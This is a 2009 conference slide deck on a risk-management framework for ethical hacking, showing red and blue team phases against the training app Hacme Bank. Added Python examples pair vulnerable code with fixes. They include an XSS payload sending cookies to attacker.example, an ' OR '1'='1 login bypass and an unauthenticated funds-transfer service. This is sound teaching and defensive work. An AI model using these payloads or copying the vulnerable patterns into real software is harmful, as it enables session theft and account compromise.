09/16/2009 © Kris Kahn, 2009 Inverting Risk Management for Ethical Hacking SecureWorld Expo ‘09


Page 1: Inverting Risk Management for Ethical Hacking (cybernetix.com/images/KAHN_-_FoRMA_PenTest_v9.pdf)

Inverting Risk Management for Ethical Hacking

SecureWorld Expo '09

Page 2: Agenda

Speaker Introductions
Learning Objectives
Framework of Risk Management & Analysis (FoRMA)
Duality of Risk
Demonstration of Information Warfare Scenario
Wrap-Up
Q&A

Page 3: Introductions

Speaker: Kris Kahn, CISSP, CISA, CGEIT, OPSA
Senior Staff, Electronic Security Governance
Seagate Technology LLC

Co-Speaker: Brian Shura, PCI-QSA
Director of Penetration Testing
AppSec Consulting

Page 4: Audience

Attendees should be involved with penetration testing or managing risks, such as:
IT Security Staff
Risk Managers
Company Officers
Ethical Hackers

Recommended knowledge:
Familiar with Security Best Practices
Understand Risk Management Concepts
Experience with Penetration Testing

Page 5: Learning Objectives

Understand the advantage of validating your security measures through ethical hacking
Recognize the benefits of applying Risk Management and Risk Exploitation methods
Understand your control options to mitigate risks
Balance your enterprise security using FoRMA

Page 6: FoRMA Overview

Page 7: Benefits of FoRMA

Big Picture: holistic relationship of related security models.
Technology Independent: universal risk management concepts.
Business Focused: minimize risk, instead of maximizing security.

Page 8: Overview

A framework for integrating industry-standard models, such as CIA*, STRIDE* and others.

Addresses Risk and Control elements:
Risk: Threat, Vulnerability
Control: Technology, Process

*: See references at the end of the presentation material

Page 9: Goal of FoRMA: Risk Mitigation

I.e. control risks within acceptable limits to support business objectives.

Establish your boundaries: define relevant policies, standards and best practices
Protect assets and resources in accordance with policy
Detect policy violations
Assure policy compliance

Page 10: Building your foundation

Start from the ground level and work your way up!

Construct a strong security foundation on which to build your security policies, standards and best practices. Use industry-established security methodologies and codes of best practice to guide your standards and practices.

A security foundation supports all layers (including physical, network, application, etc.) and addresses each security implementation phase (Awareness, Protection, Detection and Assurance).

Page 11: Building your foundation

Use a Methodology with its Sub-Model to evaluate a Subject:

Methodology                Model     Subject
Threat Management          STRIDE*   Threat
Security Architecture      APAIN*    Technology
Security Management        RIVET*    Process
Asset/Resource Management  CIA*      Vulnerability

*: See references at the end of the presentation material

Page 12: Building your foundation

This is a layered model based on the ISO OSI reference model*, which identifies five (of the original seven) layers where critical assets and resources can be identified:

Data
Application
System
Network
Physical

*: See references at the end of the presentation material

Page 13: Risk Mitigation Life Cycle

Identify, Analyze, Control, Maintain, repeat. This process life cycle will guide you through the framework to the appropriate security resolution.

Stage     Source              Target                    Result
Identify  Threat Discovery    Asset Valuation           Business Survey
Analyze   Threat Assessment   Vulnerability Assessment  Assessed Risk
Control   Threat Mitigation   Vulnerability Reduction   Controlled Risk
Maintain  Threat Management   Asset Management          Managed Risk

Page 14: Risk Mitigation Life Cycle: Identify

Risks can be received through many input channels. If a risk arises from a security incident, the threat source needs to be identified to help guide the remediation. Inactive threats from untrusted sources should also be discovered.

Valuing the business importance of the asset drives the prioritization of the remediation.

Identify: Threat Discovery, Asset Valuation, Business Survey

Page 15: Risk Mitigation Life Cycle: Analyze

To determine the risk, you must understand the threat of attack and the vulnerability of the asset or resource. We measure and analyze these items in detail to determine the corresponding risk.

Analyze: Threat Assessment and Vulnerability Assessment, yielding the Assessed Risk

Page 16: Risk Mitigation Life Cycle: Control

Once you have assessed the risk, you can apply control mechanisms in the form of technology to mitigate the threat or reduce the vulnerability.

Control: Threat Mitigation and Vulnerability Reduction, yielding the Controlled Risk

Page 17: Risk Mitigation Life Cycle: Maintain

Once a system is live, you apply counter-measures in the form of processes in the event of an attack (Incident Response) or to assure the integrity of the technology (Security Assessments).

Implement change control and regular audit processes to verify when an aspect of the formula has changed.

Maintain: Threat Management and Asset/Resource Management, yielding the Managed Risk

Page 18: FoRMA Model Overview

Risk: Threat, Vulnerability
Control: Technology, Process
Implementation phases: Awareness, Protection, Detection, Assurance

Page 19: Implementation: Phases

1. Awareness
2. Protection
3. Detection
4. Assurance

Page 20: Risk Mitigation Phases & Life Cycle

Each implementation phase (Awareness, Protection, Detection, Assurance) is worked through its own Identify, Analyze, Control, Maintain (IACM) life cycle.

Page 21: Duality of Risk

Page 22: Risk Prevention vs Risk Exploitation

Using opposing objectives, the model can be used strategically to take advantage of vulnerabilities instead of preventing damage.

Stage     Risk Prevention        Risk Exploitation
Identify  Discover               Reconnaissance
Analyze   Evaluate Risks         Evaluate Risks
Control   Mitigate Risks         Exploit Risks
Maintain  Balance Risk/Control   Risk/Control Divergence

Page 23: Risk Analysis Strategies

The Blue Team's strategy is to create a balance by mitigating the risk with the appropriate amount of control. The remaining risk is acknowledged, regularly checked and managed.

Risk = Control (+/- acceptable residual control/risk)

The Red Team's strategy is to subvert the control and leverage the risk, keeping the scales tipped in their favor.

Risk > Control

Both teams need to analyze the risks and the controls to be able to execute their strategies.

Page 24: FoRMA Model for Ethical Hacking

Risk: Threats, Vulnerabilities
Control: Technology, Process

Blue Team Strategy (phases): Awareness, Protection, Detection, Assurance
Red Team Strategy (phases): Deception, Intrusion, Evasion, Corruption

© Kris Kahn, 2009, http://www.cybernetix.com/forma

Page 25: Risk Exploitation Phases & Life Cycle

Each Red Team phase (Deception, Intrusion, Evasion, Corruption) is worked through its own Identify, Analyze, Control, Maintain (IACM) life cycle.

Page 26: Information Warfare Scenario: Red Team/Blue Team Demonstration

Page 27: Objectives

Business: become profitable by offering banking services on-line; validate security controls through a third-party pen test.

Blue Team (Operations): support the business by identifying and reducing risk.

Red Team (Ethical Hackers): exploit weaknesses to gain access to customer data, administrative functions and financial transactions.

Page 28: Penetration and Defense Life-Cycles

Red Team: 1. Deception, 2. Intrusion, 3. Evasion, 4. Corruption
Blue Team: 1. Awareness, 2. Protection, 3. Detection, 4. Assurance

Background: The business selected a Windows system running an IIS web server as the online customer interface to its WebService-based banking system and its back-end database system (MS SQL Server).

Page 29: Target

Free penetration testing platform: Hacme Bank simulates a "real-world" web services-enabled online banking application, which was built with a number of known and common vulnerabilities.

Page 30: Red Team: Phase 1 (Deception)

I: Target web server
A: Manual JavaScript vulnerability test on web-based forum
C: Cross-Site Scripting (XSS) code to steal admin cookie and reuse it
M: Elevate privileges of own account to admin status

Page 31: Analyze

Enter into forum to test: (screenshot)

Result: (screenshot)

Conclusion: A vulnerability exists that allows an XSS attack, which may lead to Elevation of Privileges (Admin access)

Risk Level: High

Page 32: Control & Maintain

Control: XSS code to steal and reuse cookie to gain access: (screenshot)

Maintain: Set attacker account privilege to Admin type

Risk Level: High

Page 33: Blue Team: Phase 1 (Awareness)

I: Focus on accounts and authorized access
A: Validate user accounts and appropriate privileges
C: Repair access/accounts as necessary
M: Improve coding practices

Page 34: Analyze

Validate accounts through database

Conclusion: Admin privileges are inappropriate for a user account; may be due to error, root cause analysis in progress

Remove unauthorized admin privileges for user account

Risk Level: High

Page 35: Control & Maintain

Control: Find the XSS attack in the forum and clean it up: (screenshot)

Maintain: Patch so that special characters entered in the forum are rejected (input validation), and improve coding practices to anticipate this class of vulnerability

Risk Level: Low
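The Red Team Phase 1 attack and the Blue Team Phase 1 fix, as an added Python example (not code from the presentation or from Hacme Bank, which is an ASP.NET application): a forum post rendered raw versus HTML-encoded at output time, the "reject special characters" input filter the slide describes, and an HttpOnly session cookie. The payload, the post texts and the cookie name are constructed for the example.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample forum posts (not taken from the Hacme Bank forum).
# The first carries a cookie-theft payload of the kind the red team used; the
# second is a legitimate post that happens to contain markup-like characters.
MALICIOUS_POST = ('<script>new Image().src="http://attacker.example/c?"'
                  '+document.cookie</script>')
BENIGN_POST = "Has anyone tried the new transfer page? 5 < 10 & it works"

# Crude check used below to see whether a rendered page still carries a script tag.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_post_vulnerable(body: str) -> str:
    """Stored XSS: the post body is written into the page exactly as stored,
    so the browser executes any script tag it contains."""
    return f'<div class="post">{body}</div>'


def render_post_encoded(body: str) -> str:
    """Output encoding at render time: <, >, &, " and ' become entities, so the
    browser displays the payload as text instead of executing it."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def contains_script_tag(rendered: str) -> bool:
    return SCRIPT_TAG.search(rendered) is not None


def accept_post_blacklist(body: str) -> bool:
    """The 'reject special characters' input-validation control from the slide.
    Returns True if the post would be accepted. Shown so the side effect is
    visible: legitimate text containing < or & is rejected too."""
    return not any(ch in body for ch in "<>\"'&")


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value with HttpOnly (script cannot read it via document.cookie)
    and Secure (only sent over HTTPS). This does not stop the injection, but it
    removes the cookie-theft payoff the red team relied on."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(render_post_vulnerable(MALICIOUS_POST))
    print(render_post_encoded(MALICIOUS_POST))
    print(session_cookie_header("ASP.NET_SessionId", "example-session-id"))
```

Two practitioner points the slide compresses: a character blacklist on input also rejects legitimate posts (the benign sample fails it) and must be repeated at every entry point, whereas encoding at render time neutralises whatever is already stored; and HttpOnly does not remove the injection but removes the cookie theft the red team used to reach the admin account.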

Page 36: Red Team: Phase 2 (Intrusion)

I: Target data flow
A: Test for SQL injection vulnerabilities
C: Exploit SQL injection flaws to bypass authentication and access admin account
M: Gather sensitive information from back-end database

Page 37: Analyze

Perform a manual test using a single quote (') to verify whether a field is vulnerable to SQL injection

Conclusion: SQL injection is possible and may lead to Elevation of Privileges (Admin access)

Risk Level: Medium

Page 38: Control

Use SQL injection attack on password field

Risk Level: High

Page 39: Control

Successfully bypassed the authentication logic

Risk Level: High

Page 40: Maintain

Leverage admin function to gather additional data

Risk Level: High

Page 41: Blue Team: Phase 2 (Protection)

I: Focus on database server SQL activity
A: Assess potential unauthorized access to back-end database through application
C: Install web application firewall for SQL injection protection
M: Update application code to use parameterized queries to prevent SQL injection

Page 42: Analyze

Unauthorized SQL activity discovered

Conclusion: Unauthorized access to the database through the application exposed user records with passwords

Risk Level: High

Page 43: Control & Maintain

Control: Install WebKnight to mitigate the risk of SQL injection attacks

Maintain: Update application code to use parameterized queries to prevent SQL injection; encrypt passwords in database

Risk Level: Low
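The authentication bypass from Red Team Phase 2 and the Blue Team Phase 2 code fixes, as an added Python example, not the presentation's or Hacme Bank's code. sqlite3 stands in for the scenario's SQL Server (the injection mechanics are the same); the user table, logins and passwords are constructed. The slide's "encrypt passwords" step is realised here as the usual practitioner choice, a salted PBKDF2 hash with a constant-time comparison, which is an interpretation, not something the slide specifies.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample users (login, clear-text password, admin flag).
SAMPLE_USERS = [("admin", "S3cret!", 1), ("jv", "jv789", 0)]
PBKDF2_ROUNDS = 50_000


def build_db() -> sqlite3.Connection:
    """User table as the scenario found it: clear-text passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "login TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users (login, password, is_admin) VALUES (?, ?, ?)",
                     SAMPLE_USERS)
    return conn


def login_vulnerable(conn, login: str, password: str):
    """Authentication as the red team found it: user input is concatenated into
    the statement, so the password field is injectable."""
    sql = ("SELECT user_id, login, is_admin FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def probe_single_quote(conn, login: str, field_value: str) -> bool:
    """The slide 37 test: a lone quote breaks the statement. A database error
    is the tell that input reaches the SQL parser unescaped."""
    try:
        login_vulnerable(conn, login, field_value)
        return False
    except sqlite3.OperationalError:
        return True


def login_parameterized(conn, login: str, password: str):
    """The slide 43 fix: placeholders keep user input as data, never as SQL."""
    sql = "SELECT user_id, login, is_admin FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone()


# --- the 'encrypt passwords' step, realised as salted PBKDF2 hashing ---

def hash_password(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored: str, candidate: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def build_hardened_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
                 "login TEXT, password_hash TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users (login, password_hash, is_admin) VALUES (?, ?, ?)",
                     [(u, hash_password(p), a) for u, p, a in SAMPLE_USERS])
    return conn


def login_hardened(conn, login: str, password: str):
    """Parameterized lookup by login only, then hash comparison in code. A dump
    of this table (slide 42) no longer yields usable passwords."""
    row = conn.execute("SELECT user_id, login, is_admin, password_hash FROM users "
                       "WHERE login = ?", (login,)).fetchone()
    if row is None or not verify_password(row[3], password):
        return None
    return row[:3]
```

login_vulnerable with the password ' OR '1'='1 returns the first row, the admin, whatever login is supplied; the same input through the parameterized query matches nothing. A web application firewall such as WebKnight filters known patterns in front of the application, which is why the slide treats it as the Control and the code change as Maintain: the filter buys time, the parameterized query removes the flaw.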

Page 44: Red Team: Phase 3 (Evasion)

I: Target hidden directories and files
A: Evade detection by avoiding known attack signatures, and scan for application backdoors
C: Access the test admin functionality without authenticating
M: Create ghost account for system owner

Page 45: Analyze

Use SensePost Wikto to identify backdoors

Conclusion: Back-door may lead to admin functionality

Risk Level: Medium

Page 46: Control & Maintain

Control: Exploit discovered development access to admin functionality

Maintain: Create "ghost" account similar to owner's name

Risk Level: High

Page 47: Blue Team: Phase 3 (Detection)

I: Focus on web activity
A: Review logs for problems or malicious activity
C: Clean up production environment and disable ghost account
M: Prevent external access to all admin functionality and only access admin functions locally

Page 48: Analyze

Web server log files show increased file size and activity

Conclusion: Web server scanning discovered a back-door exposing admin functionality (again)

Risk Level: High

Page 49: Control & Maintain

Control: Remove development back-door and "ghost" account

Maintain: Prevent unauthorized access to admin tools; use WebKnight to filter on the URL

Risk Level: Low

Page 50: Maintain

...and retain local admin functionality

Risk Level: Low
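Blue Team Phase 3 (log review for scanning, then confining admin functionality to local access) as an added Python example, not the presentation's tooling or Hacme Bank's code. The IIS log excerpt is constructed with a reduced field list; the internal network ranges and the admin/dev path prefixes are assumptions.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C-style log excerpt (a subset of the usual fields). The
# 203.0.113.5 client walks a list of guessed directory names, then finds a
# development page that answers 200; 10.0.0.12 is an internal administrator;
# 198.51.100.7 is an ordinary customer.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2009-09-16 10:00:01 203.0.113.5 GET /aspx/login.aspx 200
2009-09-16 10:00:02 203.0.113.5 GET /admin/ 404
2009-09-16 10:00:02 203.0.113.5 GET /backup/ 404
2009-09-16 10:00:03 203.0.113.5 GET /test/ 404
2009-09-16 10:00:03 203.0.113.5 GET /old/ 404
2009-09-16 10:00:04 203.0.113.5 GET /dev/ 403
2009-09-16 10:00:04 203.0.113.5 GET /dev/AdminTest.aspx 200
2009-09-16 10:05:00 10.0.0.12 GET /dev/AdminTest.aspx 200
2009-09-16 10:06:00 198.51.100.7 GET /aspx/login.aspx 200
2009-09-16 10:06:30 198.51.100.7 GET /favicon.ico 404
"""

# Assumed internal ranges and admin/dev path locations for this example.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("127.0.0.0/8")]
ADMIN_PATH_PREFIXES = ("/admin", "/dev/", "/test/")


def parse_w3c(text: str) -> list:
    """Parse W3C extended log lines using the #Fields directive as the header."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        rec["sc-status"] = int(rec["sc-status"])
        entries.append(rec)
    return entries


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_admin_path(path: str) -> bool:
    return path.lower().startswith(ADMIN_PATH_PREFIXES)


def detect(entries, window=timedelta(seconds=60), not_found_threshold=4):
    """Two detections: (1) a client producing >= not_found_threshold 404s inside
    `window` (directory/file guessing, what Wikto does); (2) any successful
    request to an admin/dev path from a non-internal address."""
    findings = []
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["c-ip"]].append(e)
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        misses = [r["ts"] for r in recs if r["sc-status"] == 404]
        start = 0
        for end in range(len(misses)):            # sliding window over 404 times
            while misses[end] - misses[start] > window:
                start += 1
            if end - start + 1 >= not_found_threshold:
                findings.append(("scanner", ip, misses[start].isoformat()))
                break
        for r in recs:
            if r["sc-status"] == 200 and is_admin_path(r["cs-uri-stem"]) and not is_internal(ip):
                findings.append(("external-admin-access", ip, r["cs-uri-stem"]))
    return findings


def allow_request(client_ip: str, path: str) -> bool:
    """URL filter for the 'retain local admin functionality' control: admin and
    dev paths are served only to internal addresses; everything else is open."""
    return is_internal(client_ip) or not is_admin_path(path)


if __name__ == "__main__":
    for finding in detect(parse_w3c(SAMPLE_LOG)):
        print(finding)
```

The 404 burst is what Wikto-style directory guessing leaves behind; the second rule catches what slide 48 found, a 200 on a development path from an outside address. allow_request is the URL filter the slide delegates to WebKnight: deny admin and dev paths unless the client is internal, so local admin functionality is retained while external access is cut off.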

Page 51: Red Team: Phase 4 (Corruption)

I: Identify other opportunities to access back-end data by reviewing details of previous error messages
A: Test access to XML forms
C: Use WebService to transfer funds
M: Re-enable attacker account

Page 52: Analyze

Identify other non-application opportunities to access the data (captured previously)

Risk Level: Low

Page 53: Analyze

Test available methods

Conclusion: Lookup by userID method is not restricted

Risk Level: Medium

Page 54: Control

Use the soapUI tool to generate a request

Risk Level: Medium

Page 55: Control

Acquire account number using the GetUserAccounts method

Risk Level: Medium

Page 56: Control

Determine system owner's account balance

Risk Level: Medium

Page 57: Control & Maintain

Control: Transfer funds

Maintain: Use WebService to re-enable attacker account

Risk Level: High

Page 58: Blue Team: Phase 4 (Assurance)

I: Focus on transaction activity
A: Identify significant banking activity and look for errors
C: Correct unauthorized account transfers, remove offending account
M: Implement authorization between the web application and the WebService

Page 59: Analyze

Identify significant banking activity and account balance discrepancy

Conclusion: Internal WebService exposed externally is allowing unauthorized and unauthenticated access

Risk Level: High

Page 60: Control & Maintain

Control:
Audit all account activity and reverse unauthorized transactions.
Implement manual approval control for large on-line transfers.
Restrict the WebService to internal IP addresses only.

Maintain: Implement authentication between the calling application (Hacme Bank) and the web service.

Risk Level: Low
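The web service weaknesses from Red Team Phase 4 (unrestricted lookup by user, unauthenticated transfers) beside the Blue Team Phase 4 controls, as an added Python example, not Hacme Bank's SOAP service. The shared key, the account data and the HMAC request signing are assumptions chosen to show "authentication between the calling application and the web service" and per-user authorization in working code; the slide does not prescribe a mechanism.

```python
import hashlib
import hmac
import json
import time

# Hypothetical shared secret provisioned to both the web application and the
# web service (an assumption of this example, not a Hacme Bank setting).
SHARED_KEY = b"replace-with-a-random-32-byte-secret"
LARGE_TRANSFER_LIMIT = 5000.0     # above this, a human approves (slide 60)
MAX_CLOCK_SKEW = 300              # seconds; bounds replay of a captured request


def sign_request(payload: dict, key: bytes = SHARED_KEY) -> str:
    """HMAC over a canonical JSON encoding. Only a holder of the key (the web
    application) can produce it, so the service can tell its own front end
    from a soapUI session pointed at the endpoint."""
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def make_request(session_user: str, **fields) -> tuple:
    """What the web application sends: the user it authenticated, the
    operation's parameters and a timestamp, all covered by the signature."""
    payload = {"session_user": session_user, "ts": int(time.time()), **fields}
    return payload, sign_request(payload)


class BankService:
    def __init__(self):
        # Constructed sample accounts: account number -> owner login and balance.
        self.accounts = {"1001": {"owner": "jv", "balance": 1200.0},
                         "1002": {"owner": "admin", "balance": 250000.0}}
        self.pending_approval = []

    # --- methods as the red team found them: no caller check, no ownership check ---
    def get_user_accounts_unrestricted(self, login: str) -> list:
        return [n for n, a in self.accounts.items() if a["owner"] == login]

    def transfer_unrestricted(self, src: str, dst: str, amount: float) -> str:
        self.accounts[src]["balance"] -= amount
        self.accounts[dst]["balance"] += amount
        return "completed"

    # --- hardened: authenticate the calling application, then authorize ---
    def _authenticate(self, payload: dict, signature: str) -> str:
        if not hmac.compare_digest(sign_request(payload), signature):
            raise PermissionError("request not signed by the trusted application")
        if abs(time.time() - payload["ts"]) > MAX_CLOCK_SKEW:
            raise PermissionError("stale request")
        return payload["session_user"]

    def get_user_accounts(self, payload: dict, signature: str) -> list:
        user = self._authenticate(payload, signature)
        if payload["login"] != user:
            raise PermissionError("lookup limited to the authenticated user's own accounts")
        return self.get_user_accounts_unrestricted(user)

    def transfer(self, payload: dict, signature: str) -> str:
        user = self._authenticate(payload, signature)
        src, dst, amount = payload["src"], payload["dst"], float(payload["amount"])
        if self.accounts[src]["owner"] != user:
            raise PermissionError("caller does not own the source account")
        if amount <= 0 or amount > self.accounts[src]["balance"] or dst not in self.accounts:
            raise ValueError("invalid transfer")
        if amount > LARGE_TRANSFER_LIMIT:
            self.pending_approval.append(payload)   # held for manual approval
            return "pending manual approval"
        return self.transfer_unrestricted(src, dst, amount)


def denied(fn, *args) -> bool:
    """True if the service refused the call with PermissionError."""
    try:
        fn(*args)
    except PermissionError:
        return True
    return False
```

The unrestricted methods answer anyone who can reach the endpoint, which is exactly what the soapUI session did. The hardened ones first check that the request was signed by the application holding the key and is fresh, then authorize the operation against the session user the application vouches for, and hold large transfers for manual approval. Restricting the endpoint to internal addresses, the slide's other control, is a network-layer complement: it does not by itself distinguish the application from anything else on the internal network.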

Page 61: Wrap-Up

Page 62: Wrap-Up

Design security controls with the attacker's perspective in mind (and vice versa).

Be proactive in the implementation of phased controls.

Validate your controls through Ethical Hacking to ensure effectiveness.

Balance your enterprise security using a risk-based framework (FoRMA) that is focused on supporting business objectives.

Page 63: Questions?

Feedback & comments are welcome

Contact information: [email protected], 831-419-1256

Page 64: Tools (downloadable, non-commercial)

Foundstone HacmeBank http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Paros http://www.parosproxy.org/
SensePost Wikto http://www.sensepost.com/research/wikto/
SoapUI http://www.soapui.org/
SQL Express Profiler http://code.google.com/p/sqlexpressprofiler/downloads/list
WebKnight http://aqtronix.com/?PageID=99

Page 65: References (*)

• Control Objectives for IT and Related Technology (COBIT), trademarked by the IT Governance Institute (ITGI).

• Open System Interconnection (OSI) reference model, developed by the International Organization for Standardization (ISO) in 1984; now considered the primary architectural model for inter-computer communications.

• STRIDE Threat Model, conceived, built upon and evangelized at Microsoft by Loren Kohnfelder, Praerit Garg, Jason Garms and Michael Howard. Explained further in "Writing Secure Code, 2nd Ed." (ISBN 0-7356-1722-8), pages 83-86.

• CIA Security Model, author unknown, taught as part of the Common Body of Knowledge for the CISSP curriculum.

• APAIN, acronym for Security Architecture, developed by Curtis Coleman in 2001.

• RIVET, acronym for Security Management, developed by Kris Kahn in 2004.

• Failure Mode and Effects Analysis (FMEA) evolved as a process tool used by the United States military as early as 1949 and is currently part of the Six Sigma curriculum.

• Capability Maturity Model (CMM) is a trademark of Carnegie Mellon University.